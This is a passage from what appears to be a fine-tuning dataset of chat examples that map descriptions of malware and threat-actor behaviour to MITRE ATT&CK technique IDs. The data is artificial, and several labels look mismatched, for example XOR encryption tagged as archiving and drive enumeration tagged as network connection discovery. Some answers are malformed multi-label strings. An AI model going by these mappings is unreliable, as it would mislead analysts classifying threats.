- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can use Native API including \"GetProcAddress\" and \"ShellExecuteW\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Traffic traversing the network will be forwarded to multiple nodes before exiting the network and continuing on to its intended destination."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Should the victim use one of these portable browsers with a proxy server configured, the malware can find that in the user’s preferences and use that proxy to communicate with its C&C servers"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Retefe is different from most banking Trojans, which typically attack web browser software to capture login credentials before they are encrypted with SSL and sent to the bank’s web server. Instead, Retefe uses the Windows PowerShell to execute a series of commands that installs a new root certificate on the system and a proxy configuration to re-route the traffic to the targeted banking websites"
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower can create a scheduled task to enable persistence mechanisms."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: cc The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has encrypted data with XOR before sending it over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "allows adversaries to modify the way the \"beacon\" payload communicates. This is called \"Malleable C2\" in the manual and is intended to allow a penetration test team to mimic known APT C2 methods."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution. 29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download"
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 created a directory named \"out\" in the user's %AppData% folder and copied files to it."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NETWIRE payload has been injected into benign Microsoft executables via process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by adding a shortcut of itself to the startup path in the Registry."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute scripts/commands and receive the results via HTTP requests"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network activity started with an HTTPS URL to namecha[.]in, which is an alternative namecoin block explorer. Namecoin is a cryptocurrency system that can be used for decentralized DNS. That proves to be the case here, since the URL returned an IP address used for subsequent post-infection traffic as shown in Figure 10"
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can use PowerShell to pull Active Directory information from the target environment."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can function as a proxy to create a serve that relays communication between the client and C&C server."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can use different cloud providers for its C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects general system enumeration data about the infected machine and checks the OS version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used Base64 to obfuscate commands and the payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos can capture data from the system’s microphone."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 used the \"ipconfig /all\" command to gather network configuration information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Digitally signed malware The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software: Thumbprint: F340C0D841F9D99DBC289151C13391000366631C Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09 Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate: Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48 This suggest that the attackers had got a hold of an Ai Squared signing key, potentially after compromising their network"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos can upload and download files to and from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore can persist via a LaunchAgent."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create a new service named msamger (Microsoft Security Accounts Manager)."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can use junk data in the Base64 string for additional obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses GetlogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The original variant of FakeM generates network beacons to its C2 server that begin with a 32-byte header that in most cases is meant to blend into network traffic generated by legitimate applications. Following this 32-byte header, the original variant of FakeM includes data encrypted using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used tools to deploy additional payloads to compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim’s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker’s server, not in a file on the victim’s endpoint. 7) Finally, TrickBot’s financial module replaces the original response that would normally come from the bank with the C2’s response, and the injected page is displayed on the victim’s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot’s Server Side Web-Injects — Top Level Flow. Figure 5: TrickBot and Dyre both use “sourcelink” and “sourcequery” for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters"
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has collected data from remote systems by mounting network shares with \"net use\" and using Robocopy to transfer data."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses \"tasklist /svc\" to display running tasks."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has installed updates and new malware on victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum has used DriveLetterView to enumerate drive information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This links the previous samples with this unique username"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides base64-encoded and encrypted C2 server locations in comments on legitimate websites."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor contains functionality to query the local/system time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the hostname of the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor can enumerate all connected drives."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can list local services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack removes itself after execution and can delete files on the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware."
- },
- {
- "role": "assistant",
- "content": "T1587.002 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Samples compiled in 2017 and 2018 were hard-coded with specific URI patterns to communicate with the C2 server via HTTP POST requests"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has attempted to discover services for third party EDR products."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot uses SSL for encrypting C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind obtains the number of removable drives from the victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS copies files with certain extensions from USB devices to\na predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Socksbot can take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the malware is downloaded and files verified, the script will check in the C:\\Program Files\\ directory for the presence Avast antivirus, which happens to be the most common installed AV worldwide"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used Themida to pack malicious DLLs and other files."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has gathered credentials using Mimikatz and ProcDump."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has used WMIC.exe for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples install themselves as services for persistence by calling WinExec with the net start argument."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Checks if the user has Administrator privilege 2) Drops the Cobalt Strike Stager in debug or “%TEMP%” directory as “tmp_FlVnNI.dat” depending on the user privilege 3) Opens the decoy Word document 4) Locates the InstallUtil.exe and its installed version 5) Copies “schtasks.exe” to “%TEMP%” directory and renames it to “wtask.exe” 6) Creates Scheduled tasks with the name “Security Script kb00855787” 7) Renames “wscript.exe” into “winwsh.exe” 8) Runs the scheduled task to execute the Cobalt Strike Stager 9) C2 communication"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
